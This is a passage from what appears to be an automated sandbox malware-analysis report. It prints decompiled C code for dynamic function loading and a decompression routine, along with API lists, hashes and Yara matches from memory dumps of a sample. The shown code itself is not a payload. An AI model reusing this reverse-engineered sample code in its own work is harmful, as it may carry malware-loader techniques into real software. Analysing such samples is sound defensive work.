                                                                          											L79:
                                                                          											_v40 = 1;
                                                                          										}
                                                                          										goto L61;
                                                                          									case 0x17:
                                                                          										__eax =  &_v12;
                                                                          										__eax = E10001A9F( &_v12);
                                                                          										__ebx = __eax;
                                                                          										__ebx = __eax + 1;
                                                                          										L91:
                                                                          										__eflags = __ebx;
                                                                          										if(__ebx == 0) {
                                                                          											goto L61;
                                                                          										}
                                                                          										L92:
                                                                          										__eflags = _v20;
                                                                          										_v40 = 1;
                                                                          										if(_v20 != 0) {
                                                                          											L97:
                                                                          											__eflags = _v20 - 1;
                                                                          											if(_v20 == 1) {
                                                                          												__eax = _v16;
                                                                          												__eax = _v16 << 5;
                                                                          												__eflags = __eax;
                                                                          												 *(__eax + __esi + 0x102c) = __ebx;
                                                                          											}
                                                                          											goto L99;
                                                                          										}
                                                                          										_v16 = _v16 << 5;
                                                                          										_t141 = __esi + 0x1030; // 0x1030
                                                                          										__edi = (_v16 << 5) + _t141;
                                                                          										__eax =  *__edi;
                                                                          										__eflags = __eax - 0xffffffff;
                                                                          										if(__eax <= 0xffffffff) {
                                                                          											L95:
                                                                          											__eax = GlobalFree(__eax);
                                                                          											L96:
                                                                          											 *__edi = __ebx;
                                                                          											goto L97;
                                                                          										}
                                                                          										__eflags = __eax - 0x19;
                                                                          										if(__eax <= 0x19) {
                                                                          											goto L96;
                                                                          										}
                                                                          										goto L95;
                                                                          									case 0x18:
                                                                          										goto L61;
                                                                          								}
                                                                          							}
                                                                          							_t263 = _t259 - 1;
                                                                          							__eflags = _t263;
                                                                          							if(_t263 == 0) {
                                                                          								_v16 = _t284;
                                                                          								goto L74;
                                                                          							}
                                                                          							__eflags = _t263 != 1;
                                                                          							if(_t263 != 1) {
                                                                          								goto L141;
                                                                          							}
                                                                          							_t266 = _t287 - 0x21;
                                                                          							__eflags = _t266;
                                                                          							if(_t266 == 0) {
                                                                          								_v8 =  ~_v8;
                                                                          								goto L61;
                                                                          							}
                                                                          							_t267 = _t266 - 0x42;
                                                                          							__eflags = _t267;
                                                                          							if(_t267 == 0) {
                                                                          								L57:
                                                                          								__eflags = _v8 - 1;
                                                                          								if(_v8 != 1) {
                                                                          									_t92 = _t319 + 0x1010;
                                                                          									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
                                                                          									__eflags =  *_t92;
                                                                          								} else {
                                                                          									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
                                                                          								}
                                                                          								_v8 = 1;
                                                                          								goto L61;
                                                                          							}
                                                                          							_t272 = _t267;
                                                                          							__eflags = _t272;
                                                                          							if(_t272 == 0) {
                                                                          								_push(0x20);
                                                                          								L56:
                                                                          								_pop(1);
                                                                          								goto L57;
                                                                          							}
                                                                          							_t273 = _t272 - 9;
                                                                          							__eflags = _t273;
                                                                          							if(_t273 == 0) {
                                                                          								_push(8);
                                                                          								goto L56;
                                                                          							}
                                                                          							_t274 = _t273 - 4;
                                                                          							__eflags = _t274;
                                                                          							if(_t274 == 0) {
                                                                          								_push(4);
                                                                          								goto L56;
                                                                          							}
                                                                          							_t275 = _t274 - 1;
                                                                          							__eflags = _t275;
                                                                          							if(_t275 == 0) {
                                                                          								_push(0x10);
                                                                          								goto L56;
                                                                          							}
                                                                          							__eflags = _t275 != 0;
                                                                          							if(_t275 != 0) {
                                                                          								goto L61;
                                                                          							}
                                                                          							_push(0x40);
                                                                          							goto L56;
                                                                          						}
                                                                          						goto L15;
                                                                          					}
                                                                          					_t278 = _t249 - 5;
                                                                          					if(_t278 == 0) {
                                                                          						__eflags = _v36 - 3;
                                                                          						_v32 = 1;
                                                                          						_v8 = _t284;
                                                                          						_v20 = _t284;
                                                                          						_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                          						_v40 = _t284;
                                                                          						goto L17;
                                                                          					}
                                                                          					_t282 = _t278 - 1;
                                                                          					if(_t282 == 0) {
                                                                          						_v32 = 2;
                                                                          						_v8 = _t284;
                                                                          						_v20 = _t284;
                                                                          						goto L17;
                                                                          					}
                                                                          					if(_t282 != 0x16) {
                                                                          						goto L40;
                                                                          					} else {
                                                                          						_v32 = 3;
                                                                          						_v8 = 1;
                                                                          						goto L17;
                                                                          					}
                                                                          				}
                                                                          				GlobalFree(_v52);
                                                                          				GlobalFree(_v24);
                                                                          				GlobalFree(_v44);
                                                                          				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
                                                                          					L161:
                                                                          					return _t319;
                                                                          				} else {
                                                                          					_t216 =  *_t319 - 1;
                                                                          					if(_t216 == 0) {
                                                                          						_t178 = _t319 + 8; // 0x8
                                                                          						_t312 = _t178;
                                                                          						__eflags =  *_t312 - _t284;
                                                                          						if( *_t312 != _t284) {
                                                                          							_t217 = GetModuleHandleW(_t312);
                                                                          							__eflags = _t217 - _t284;
                                                                          							 *(_t319 + 0x1008) = _t217;
                                                                          							if(_t217 != _t284) {
                                                                          								L150:
                                                                          								_t183 = _t319 + 0x808; // 0x808
                                                                          								_t313 = _t183;
                                                                          								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
                                                                          								__eflags = _t218 - _t284;
                                                                          								 *(_t319 + 0x100c) = _t218;
                                                                          								if(_t218 == _t284) {
                                                                          									__eflags =  *_t313 - 0x23;
                                                                          									if( *_t313 == 0x23) {
                                                                          										_t186 = _t319 + 0x80a; // 0x80a
                                                                          										_t222 = E10001311(_t186);
                                                                          										__eflags = _t222 - _t284;
                                                                          										if(_t222 != _t284) {
                                                                          											__eflags = _t222 & 0xffff0000;
                                                                          											if((_t222 & 0xffff0000) == 0) {
                                                                          												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          								__eflags = _v48 - _t284;
                                                                          								if(_v48 != _t284) {
                                                                          									L157:
                                                                          									_t313[lstrlenW(_t313)] = 0x57;
                                                                          									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
                                                                          									__eflags = _t220 - _t284;
                                                                          									if(_t220 != _t284) {
                                                                          										L145:
                                                                          										 *(_t319 + 0x100c) = _t220;
                                                                          										goto L161;
                                                                          									}
                                                                          									__eflags =  *(_t319 + 0x100c) - _t284;
                                                                          									L159:
                                                                          									if(__eflags != 0) {
                                                                          										goto L161;
                                                                          									}
                                                                          									L160:
                                                                          									_t197 = _t319 + 4;
                                                                          									 *_t197 =  *(_t319 + 4) | 0xffffffff;
                                                                          									__eflags =  *_t197;
                                                                          									goto L161;
                                                                          								} else {
                                                                          									__eflags =  *(_t319 + 0x100c) - _t284;
                                                                          									if( *(_t319 + 0x100c) != _t284) {
                                                                          										goto L161;
                                                                          									}
                                                                          									goto L157;
                                                                          								}
                                                                          							}
                                                                          							_t225 = LoadLibraryW(_t312);
                                                                          							__eflags = _t225 - _t284;
                                                                          							 *(_t319 + 0x1008) = _t225;
                                                                          							if(_t225 == _t284) {
                                                                          								goto L160;
                                                                          							}
                                                                          							goto L150;
                                                                          						}
                                                                          						_t179 = _t319 + 0x808; // 0x808
                                                                          						_t227 = E10001311(_t179);
                                                                          						 *(_t319 + 0x100c) = _t227;
                                                                          						__eflags = _t227 - _t284;
                                                                          						goto L159;
                                                                          					}
                                                                          					_t228 = _t216 - 1;
                                                                          					if(_t228 == 0) {
                                                                          						_t176 = _t319 + 0x808; // 0x808
                                                                          						_t229 = _t176;
                                                                          						__eflags =  *_t229 - _t284;
                                                                          						if( *_t229 == _t284) {
                                                                          							goto L161;
                                                                          						}
                                                                          						_t220 = E10001311(_t229);
                                                                          						L144:
                                                                          						goto L145;
                                                                          					}
                                                                          					if(_t228 != 1) {
                                                                          						goto L161;
                                                                          					}
                                                                          					_t80 = _t319 + 8; // 0x8
                                                                          					_t285 = _t80;
                                                                          					_t314 = E10001311(_t80);
                                                                          					 *(_t319 + 0x1008) = _t314;
                                                                          					if(_t314 == 0) {
                                                                          						goto L160;
                                                                          					}
                                                                          					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
                                                                          					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
                                                                          					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
                                                                          					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
                                                                          					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
                                                                          					_t89 = _t319 + 0x808; // 0x808
                                                                          					_t220 =  *(_t314->i + E10001311(_t89) * 4);
                                                                          					goto L144;
                                                                          				}
                                                                          			}































































                                                                          0x00000000
                                                                          0x10001c87
                                                                          0x10001c89
                                                                          0x10001c97
                                                                          0x10001c9a
                                                                          0x10001c9c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001c9e
                                                                          0x10001c9e
                                                                          0x10001c9e
                                                                          0x10001ca4
                                                                          0x10001ca6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001ca8
                                                                          0x10001caa
                                                                          0x10001cac
                                                                          0x10001cae
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001cae
                                                                          0x10001cb0
                                                                          0x10001cb2
                                                                          0x10001cb4
                                                                          0x10001cb4
                                                                          0x10001cba
                                                                          0x10001cc0
                                                                          0x10001cc2
                                                                          0x10001cd6
                                                                          0x10001cd6
                                                                          0x10001cd8
                                                                          0x10001cc4
                                                                          0x10001cca
                                                                          0x10001ccd
                                                                          0x10001ccd
                                                                          0x00000000
                                                                          0x10001c5f
                                                                          0x10001c5f
                                                                          0x10001c5f
                                                                          0x10001c60
                                                                          0x10001c68
                                                                          0x10001c6c
                                                                          0x10001c72
                                                                          0x10001c76
                                                                          0x10001cde
                                                                          0x10001ce1
                                                                          0x10001ce5
                                                                          0x10001d70
                                                                          0x10001d74
                                                                          0x10001b59
                                                                          0x00000000
                                                                          0x10001b59
                                                                          0x00000000
                                                                          0x10001d74
                                                                          0x10001c62
                                                                          0x10001c62
                                                                          0x10001c63
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001c65
                                                                          0x10001c66
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001c66
                                                                          0x10001c5d
                                                                          0x10001bf7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001c00
                                                                          0x10001c03
                                                                          0x10001c10
                                                                          0x10001c10
                                                                          0x10001c05
                                                                          0x00000000
                                                                          0x10001c05
                                                                          0x10001b7a
                                                                          0x10001b7d
                                                                          0x10001bce
                                                                          0x10001bd1
                                                                          0x10001be3
                                                                          0x10001be3
                                                                          0x10001be6
                                                                          0x00000000
                                                                          0x10001be6
                                                                          0x10001bd3
                                                                          0x10001bd8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001bda
                                                                          0x10001bdd
                                                                          0x10001ced
                                                                          0x10001cf0
                                                                          0x10001cf0
                                                                          0x10001cf2
                                                                          0x10002048
                                                                          0x1000204b
                                                                          0x100020b2
                                                                          0x10001d60
                                                                          0x10001d63
                                                                          0x10001d66
                                                                          0x10001d69
                                                                          0x10001d69
                                                                          0x10001d6b
                                                                          0x10001d6c
                                                                          0x10001d6c
                                                                          0x10001d6d
                                                                          0x00000000
                                                                          0x10001d6d
                                                                          0x1000204d
                                                                          0x10002050
                                                                          0x10002057
                                                                          0x10002057
                                                                          0x1000205b
                                                                          0x1000206f
                                                                          0x1000206f
                                                                          0x10002072
                                                                          0x10002076
                                                                          0x100020be
                                                                          0x100020c1
                                                                          0x100020c5
                                                                          0x00000000
                                                                          0x100020c5
                                                                          0x10002078
                                                                          0x1000207c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000207e
                                                                          0x10002085
                                                                          0x10002085
                                                                          0x1000208b
                                                                          0x1000208e
                                                                          0x100020aa
                                                                          0x10002090
                                                                          0x10002099
                                                                          0x1000209c
                                                                          0x1000209c
                                                                          0x00000000
                                                                          0x1000208e
                                                                          0x1000205d
                                                                          0x10002060
                                                                          0x10002064
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10002066
                                                                          0x00000000
                                                                          0x10002066
                                                                          0x10002052
                                                                          0x10002055
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10002055
                                                                          0x10001cf8
                                                                          0x10001cf8
                                                                          0x10001cf9
                                                                          0x10001e29
                                                                          0x10001e29
                                                                          0x10001e2e
                                                                          0x10001e31
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001e3e
                                                                          0x00000000
                                                                          0x10001fe5
                                                                          0x10001fe8
                                                                          0x10001feb
                                                                          0x10001feb
                                                                          0x10001fec
                                                                          0x10001fed
                                                                          0x10001ff0
                                                                          0x10001ff3
                                                                          0x10001ff6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001ff8
                                                                          0x10001ff8
                                                                          0x10001ffc
                                                                          0x10002014
                                                                          0x10002017
                                                                          0x10002021
                                                                          0x00000000
                                                                          0x10002021
                                                                          0x10001ffe
                                                                          0x10001ffe
                                                                          0x10002001
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10002003
                                                                          0x10002006
                                                                          0x10002008
                                                                          0x10002009
                                                                          0x10002009
                                                                          0x10002009
                                                                          0x1000200a
                                                                          0x1000200d
                                                                          0x10002010
                                                                          0x10002011
                                                                          0x10001feb
                                                                          0x10001fec
                                                                          0x10001fed
                                                                          0x10001ff0
                                                                          0x10001ff3
                                                                          0x10001ff6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001ff6
                                                                          0x00000000
                                                                          0x10001e85
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001e91
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001e78
                                                                          0x10001e7c
                                                                          0x10001e80
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001fb6
                                                                          0x10001fba
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001fc0
                                                                          0x10001fc9
                                                                          0x10001fd0
                                                                          0x10001fd8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001f53
                                                                          0x10001f53
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001e9a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10002040
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10002030
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10002034
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000203c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001f76
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001f5b
                                                                          0x10001f5d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001f7e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001f63
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001f67
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10002038
                                                                          0x10002042
                                                                          0x10002042
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001f86
                                                                          0x10001f8a
                                                                          0x10001f8f
                                                                          0x10001f92
                                                                          0x10001f93
                                                                          0x10001f96
                                                                          0x10001f9c
                                                                          0x10001f9c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10002028
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001f6b
                                                                          0x10001f6e
                                                                          0x10001f70
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001ea1
                                                                          0x10001ea1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001f7a
                                                                          0x10001f80
                                                                          0x10001f80
                                                                          0x10001ea3
                                                                          0x10001ea3
                                                                          0x10001ea6
                                                                          0x10001ead
                                                                          0x10001eb0
                                                                          0x10001eb2
                                                                          0x10001eb4
                                                                          0x10001eb5
                                                                          0x10001eb9
                                                                          0x10001ebc
                                                                          0x10001ec2
                                                                          0x10001ec8
                                                                          0x10001ec8
                                                                          0x10001eca
                                                                          0x10001eca
                                                                          0x10001ecd
                                                                          0x10001ed3
                                                                          0x10001ed5
                                                                          0x10001ed9
                                                                          0x10001ede
                                                                          0x10001ede
                                                                          0x10001ee0
                                                                          0x10001ee0
                                                                          0x10001ee3
                                                                          0x10001ee6
                                                                          0x10001eef
                                                                          0x10001ef5
                                                                          0x10001ef8
                                                                          0x10001ef8
                                                                          0x10001efa

                                                                          APIs
                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                          • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                          • String ID:
                                                                          • API String ID: 4227406936-0
                                                                          • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                          • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MemoryProtectVirtual
                                                                          • String ID: MG$_\8R
                                                                          • API String ID: 2706961497-2440753728
                                                                          • Opcode ID: 06c5ebf70fac01618f9a258c384bd0624a98622fa708c1474c3d8ee612cd27a3
                                                                          • Instruction ID: c933d56e1dfc363ca857a30dba4a7df6b53abd89bf7c40e5a1a1772e89fda30f
                                                                          • Opcode Fuzzy Hash: 06c5ebf70fac01618f9a258c384bd0624a98622fa708c1474c3d8ee612cd27a3
                                                                          • Instruction Fuzzy Hash: 3D522970A043858FDF35DE38C8A87DA7BD2AF56360F4982AECC998F196D3358546C712
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: I$S
                                                                          • API String ID: 0-2206240437
                                                                          • Opcode ID: 27fc15ef930a1f12500d355c2ed0f42c217d5325a9b21c54231d8bf2cf64e4a4
                                                                          • Instruction ID: 3c41331fbc21de697cd73afc6dca51cb47a23b0c6fc63bcea568bd7e51b000dd
                                                                          • Opcode Fuzzy Hash: 27fc15ef930a1f12500d355c2ed0f42c217d5325a9b21c54231d8bf2cf64e4a4
                                                                          • Instruction Fuzzy Hash: BDF17A79A047C6DFDF34AE3884A53EA37E2EF62350F898169CCC99B545D7309982C742
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004072B4(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                          				signed int _v8;
                                                                          				unsigned int _v12;
                                                                          				signed int _v16;
                                                                          				intOrPtr _v20;
                                                                          				signed int _v24;
                                                                          				signed int _v28;
                                                                          				intOrPtr* _v32;
                                                                          				signed int* _v36;
                                                                          				signed int _v40;
                                                                          				signed int _v44;
                                                                          				intOrPtr _v48;
                                                                          				intOrPtr _v52;
                                                                          				void _v116;
                                                                          				signed int _v176;
                                                                          				signed int _v180;
                                                                          				signed int _v240;
                                                                          				signed int _t166;
                                                                          				signed int _t168;
                                                                          				intOrPtr _t175;
                                                                          				signed int _t181;
                                                                          				void* _t182;
                                                                          				intOrPtr _t183;
                                                                          				signed int* _t184;
                                                                          				signed int _t186;
                                                                          				signed int _t187;
                                                                          				signed int* _t189;
                                                                          				signed int _t190;
                                                                          				intOrPtr* _t191;
                                                                          				intOrPtr _t192;
                                                                          				signed int _t193;
                                                                          				signed int _t195;
                                                                          				signed int _t200;
                                                                          				signed int _t205;
                                                                          				void* _t207;
                                                                          				short _t208;
                                                                          				signed char _t222;
                                                                          				signed int _t224;
                                                                          				signed int _t225;
                                                                          				signed int* _t232;
                                                                          				signed int _t233;
                                                                          				signed int _t234;
                                                                          				void* _t235;
                                                                          				signed int _t236;
                                                                          				signed int _t244;
                                                                          				signed int _t246;
                                                                          				signed int _t251;
                                                                          				signed int _t254;
                                                                          				signed int _t256;
                                                                          				signed int _t259;
                                                                          				signed int _t262;
                                                                          				void* _t263;
                                                                          				void* _t264;
                                                                          				signed int _t267;
                                                                          				intOrPtr _t269;
                                                                          				intOrPtr _t271;
                                                                          				signed int _t274;
                                                                          				intOrPtr* _t275;
                                                                          				unsigned int _t276;
                                                                          				void* _t277;
                                                                          				signed int _t278;
                                                                          				intOrPtr* _t279;
                                                                          				signed int _t281;
                                                                          				intOrPtr _t282;
                                                                          				intOrPtr _t283;
                                                                          				signed int* _t284;
                                                                          				signed int _t286;
                                                                          				signed int _t287;
                                                                          				signed int _t288;
                                                                          				intOrPtr _t296;
                                                                          				signed int* _t297;
                                                                          				intOrPtr _t298;
                                                                          				void* _t299;
                                                                          
                                                                          				_t278 = _a8;
                                                                          				_t187 = 0x10;
                                                                          				memset( &_v116, 0, _t187 << 2);
                                                                          				_t189 = _a4;
                                                                          				_t233 = _t278;
                                                                          				do {
                                                                          					_t166 =  *_t189;
                                                                          					_t189 =  &(_t189[1]);
                                                                          					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                          					_t233 = _t233 - 1;
                                                                          				} while (_t233 != 0);
                                                                          				if(_v116 != _t278) {
                                                                          					_t279 = _a28;
                                                                          					_t267 =  *_t279;
                                                                          					_t190 = 1;
                                                                          					_a28 = _t267;
                                                                          					_t234 = 0xf;
                                                                          					while(1) {
                                                                          						_t168 = 0;
                                                                          						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                          							break;
                                                                          						}
                                                                          						_t190 = _t190 + 1;
                                                                          						if(_t190 <= _t234) {
                                                                          							continue;
                                                                          						}
                                                                          						break;
                                                                          					}
                                                                          					_v8 = _t190;
                                                                          					if(_t267 < _t190) {
                                                                          						_a28 = _t190;
                                                                          					}
                                                                          					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                          						_t234 = _t234 - 1;
                                                                          						if(_t234 != 0) {
                                                                          							continue;
                                                                          						}
                                                                          						break;
                                                                          					}
                                                                          					_v28 = _t234;
                                                                          					if(_a28 > _t234) {
                                                                          						_a28 = _t234;
                                                                          					}
                                                                          					 *_t279 = _a28;
                                                                          					_t181 = 1 << _t190;
                                                                          					while(_t190 < _t234) {
                                                                          						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                          						if(_t182 < 0) {
                                                                          							L64:
                                                                          							return _t168 | 0xffffffff;
                                                                          						}
                                                                          						_t190 = _t190 + 1;
                                                                          						_t181 = _t182 + _t182;
                                                                          					}
                                                                          					_t281 = _t234 << 2;
                                                                          					_t191 = _t299 + _t281 - 0x70;
                                                                          					_t269 =  *_t191;
                                                                          					_t183 = _t181 - _t269;
                                                                          					_v52 = _t183;
                                                                          					if(_t183 < 0) {
                                                                          						goto L64;
                                                                          					}
                                                                          					_v176 = _t168;
                                                                          					 *_t191 = _t269 + _t183;
                                                                          					_t192 = 0;
                                                                          					_t235 = _t234 - 1;
                                                                          					if(_t235 == 0) {
                                                                          						L21:
                                                                          						_t184 = _a4;
                                                                          						_t271 = 0;
                                                                          						do {
                                                                          							_t193 =  *_t184;
                                                                          							_t184 =  &(_t184[1]);
                                                                          							if(_t193 != _t168) {
                                                                          								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                          								_t236 =  *_t232;
                                                                          								 *((intOrPtr*)(0x432170 + _t236 * 4)) = _t271;
                                                                          								 *_t232 = _t236 + 1;
                                                                          							}
                                                                          							_t271 = _t271 + 1;
                                                                          						} while (_t271 < _a8);
                                                                          						_v16 = _v16 | 0xffffffff;
                                                                          						_v40 = _v40 & 0x00000000;
                                                                          						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                          						_t195 = _v8;
                                                                          						_t186 =  ~_a28;
                                                                          						_v12 = _t168;
                                                                          						_v180 = _t168;
                                                                          						_v36 = 0x432170;
                                                                          						_v240 = _t168;
                                                                          						if(_t195 > _v28) {
                                                                          							L62:
                                                                          							_t168 = 0;
                                                                          							if(_v52 == 0 || _v28 == 1) {
                                                                          								return _t168;
                                                                          							} else {
                                                                          								goto L64;
                                                                          							}
                                                                          						}
                                                                          						_v44 = _t195 - 1;
                                                                          						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                          						do {
                                                                          							_t282 =  *_v32;
                                                                          							if(_t282 == 0) {
                                                                          								goto L61;
                                                                          							}
                                                                          							while(1) {
                                                                          								_t65 =  &_a28; // 0x432170
                                                                          								_t283 = _t282 - 1;
                                                                          								_t200 =  *_t65 + _t186;
                                                                          								_v48 = _t283;
                                                                          								_v24 = _t200;
                                                                          								if(_v8 <= _t200) {
                                                                          									goto L45;
                                                                          								}
                                                                          								L31:
                                                                          								_v20 = _t283 + 1;
                                                                          								do {
                                                                          									_v16 = _v16 + 1;
                                                                          									_t296 = _v28 - _v24;
                                                                          									_t74 =  &_a28; // 0x432170
                                                                          									if(_t296 >  *_t74) {
                                                                          										_t75 =  &_a28; // 0x432170
                                                                          										_t296 =  *_t75;
                                                                          									}
                                                                          									_t222 = _v8 - _v24;
                                                                          									_t254 = 1 << _t222;
                                                                          									if(1 <= _v20) {
                                                                          										L40:
                                                                          										_t256 =  *_a36;
                                                                          										_t168 = 1 << _t222;
                                                                          										_v40 = 1;
                                                                          										_t274 = _t256 + 1;
                                                                          										if(_t274 > 0x5a0) {
                                                                          											goto L64;
                                                                          										}
                                                                          									} else {
                                                                          										_t275 = _v32;
                                                                          										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                          										if(_t222 >= _t296) {
                                                                          											goto L40;
                                                                          										}
                                                                          										while(1) {
                                                                          											_t222 = _t222 + 1;
                                                                          											if(_t222 >= _t296) {
                                                                          												goto L40;
                                                                          											}
                                                                          											_t275 = _t275 + 4;
                                                                          											_t264 = _t263 + _t263;
                                                                          											_t175 =  *_t275;
                                                                          											if(_t264 <= _t175) {
                                                                          												goto L40;
                                                                          											}
                                                                          											_t263 = _t264 - _t175;
                                                                          										}
                                                                          										goto L40;
                                                                          									}
                                                                          									_t168 = _a32 + _t256 * 4;
                                                                          									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                          									 *_a36 = _t274;
                                                                          									_t259 = _v16;
                                                                          									 *_t297 = _t168;
                                                                          									if(_t259 == 0) {
                                                                          										 *_a24 = _t168;
                                                                          									} else {
                                                                          										_t276 = _v12;
                                                                          										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                          										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                          										_t98 =  &_a28; // 0x432170
                                                                          										_a5 =  *_t98;
                                                                          										_a4 = _t222;
                                                                          										_t262 = _t276 >> _t186;
                                                                          										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                          										 *(_t298 + _t262 * 4) = _a4;
                                                                          									}
                                                                          									_t224 = _v24;
                                                                          									_t186 = _t224;
                                                                          									_t107 =  &_a28; // 0x432170
                                                                          									_t225 = _t224 +  *_t107;
                                                                          									_v24 = _t225;
                                                                          								} while (_v8 > _t225);
                                                                          								L45:
                                                                          								_t111 =  &_v36; // 0x432170
                                                                          								_t284 =  *_t111;
                                                                          								_a5 = _v8 - _t186;
                                                                          								if(_t284 < 0x432170 + _a8 * 4) {
                                                                          									_t205 =  *_t284;
                                                                          									if(_t205 >= _a12) {
                                                                          										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                          										_v36 =  &(_v36[1]);
                                                                          										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                          										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                          									} else {
